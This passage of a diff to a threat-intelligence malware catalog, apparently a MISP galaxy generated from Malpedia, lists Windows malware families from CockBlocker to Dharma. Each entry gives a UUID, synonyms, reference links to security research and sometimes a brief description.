"https://twitter.com/JaromirHorejsi/status/817311664391524352" - ] - }, - "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", - "value": "CockBlocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" - ] - }, - "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", - "value": "CodeKey", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", - "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" - ] - }, - "uuid": "9481d7b1-307c-4504-9333-21720b85317b", - "value": "Cohhoc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", - "https://secrary.com/ReversingMalware/CoinMiner/", - "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" - ] - }, - "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", - "value": "Coinminer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bandios", - "GrayBird" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", - "https://twitter.com/anyrun_app/status/976385355384590337", - "https://secrary.com/ReversingMalware/Colony_Bandios/", - "https://pastebin.com/GtjBXDmz" - ] - }, - "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", - "value": "Colony", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" - ] - }, - "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", - "value": "Combojack", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", - "value": "Combos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", - "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" - ] - }, - "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", - "value": "ComodoSec", - "description": "" - }, - { - "meta": { - "synonyms": [ - "lojack" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", - "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", - "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", - "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", - "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" - ] - }, - "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", - "value": "Computrace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", - "https://twitter.com/struppigel/status/816926371867926528" - ] - }, - "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", - "value": "ComradeCircle", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", - "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] - }, - "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", - "value": "concealment_troy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "downadup", - "traffic converter" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "http://contagiodump.blogspot.com/2009/05/win32conficker.html" - ] - }, - "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", - "value": "Conficker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" - ] - }, - "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", - "value": "Confucius", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", - "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" - ] - }, - "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", - "value": "Contopee", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", - "value": "CookieBag", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", - "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", - "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" - ] - }, - "uuid": "495377c4-1be5-4c65-ba66-94c221061415", - "value": "Corebot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://malware.prevenity.com/2014/08/malware-info.html", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" - ] - }, - "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", - "value": "Coreshell", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", - "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" - ] - }, - "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", - "value": "CradleCore", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Crash", - "Industroyer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", - "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", - "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", - "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" - ] - }, - "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", - "value": "CrashOverride", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - }, - "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", - "value": "Credraptor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" - ] - }, - "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", - "value": "Crenufs", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - }, - "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] - }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", - "https://hackmag.com/security/ransomware-russian-style/", - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", - "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", - "https://twitter.com/demonslay335/status/971164798376468481" - ] - }, - "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", - "value": "Cryakl", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" - ] - }, - "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", - "value": "CryLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", - "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] - }, - "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", - "value": "CrypMic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", - "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" - ] - }, - "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", - "value": "Crypt0l0cker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", - "https://www.secureworks.com/research/cryptolocker-ransomware", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" - ] - }, - "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", - "value": "CryptoLocker", - "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", - "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" - ] - }, - "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", - "value": "CryptoLuck", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CryptFile2" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", - "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", - "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" - ] - }, - "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", - "value": "CryptoMix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", - "https://twitter.com/struppigel/status/810770490491043840" - ] - }, - "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", - "value": "Cryptorium", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", - "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", - "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" - ] - }, - "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", - "value": "CryptoShield", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", - "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" - ] - }, - "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", - "value": "CryptoShuffler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" - ] - }, - "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", - "value": "Cryptowall", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", - "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" - ] - }, - "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", - "value": "CryptoWire", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", - "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", - "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", - "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" - ] - }, - "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", - "value": "CryptoFortress", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", - "https://twitter.com/JaromirHorejsi/status/818369717371027456" - ] - }, - "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", - "value": "CryptoRansomeware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] - }, - "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", - "value": "CryptXXXX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", - "value": "CsExt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Windshield?" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", - "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" - ] - }, - "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", - "value": "Cuegoe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", - "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" - ] - }, - "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", - "value": "Cueisfry", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", - "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" - ] - }, - "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", - "value": "Cutlet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" - ] - }, - "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", - "value": "Cutwail", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Rebhip" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" - ] - }, - "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", - "value": "CyberGate", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" - ] - }, - "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", - "value": "CyberSplitter", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", - "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" - ] - }, - "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", - "value": "CycBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", - "value": "Dairy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", - "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" - ] - }, - "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", - "value": "DanaBot", - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " - }, - { - "meta": { - "synonyms": [ - "Fynloski", - "klovbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", - "https://darkcomet.net", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] - }, - "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", - "value": "DarkComet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", - "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", - "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" - ] - }, - "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", - "value": "DarkMegi", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Chymine" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", - "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", - "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", - "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" - ] - }, - "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", - "value": "Darkmoon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] - }, - "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", - "value": "DarkPulsar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", - "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" - ] - }, - "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", - "value": "DarkShell", - "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "http://telegra.ph/Analiz-botneta-DarkSky-12-30", - "https://github.com/ims0rry/DarkSky-botnet" - ] - }, - "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", - "value": "Darksky", - "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", - "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" - ] - }, - "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", - "value": "DarkStRat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", - "https://securelist.com/dark-tequila-anejo/87528/" - ] - }, - "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", - "value": "DarkTequila", - "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", - "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", - "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" - ] - }, - "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", - "value": "Darktrack RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Muirim", - "Nioupale" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", - "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] - }, - "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", - "value": "Daserf", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" - ] - }, - "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", - "value": "Datper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] - }, - "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", - "value": "DDKONG", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", - "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", - "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" - ] - }, - "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", - "value": "Decebal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", - "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" - ] - }, - "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", - "value": "Delta(Alfa,Bravo, ...)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" - ] - }, - "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", - "value": "Dented", - "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", - "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" - ] - }, - "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", - "value": "DeputyDog", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", - "https://twitter.com/struppigel/status/812601286088597505" - ] - }, - "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", - "value": "DeriaLock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", - "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" - ] - }, - "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" - ] - }, - "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", - "value": "Devil's Rat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "LusyPOS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", - "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", - "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", - "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", - "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" - ] - }, - "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", - "value": "Dexter", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", - "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", - "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", - "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" - ] - }, - "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", - "value": "DE Loader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Crysis", - "Arena" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" - ] - }, - "uuid": 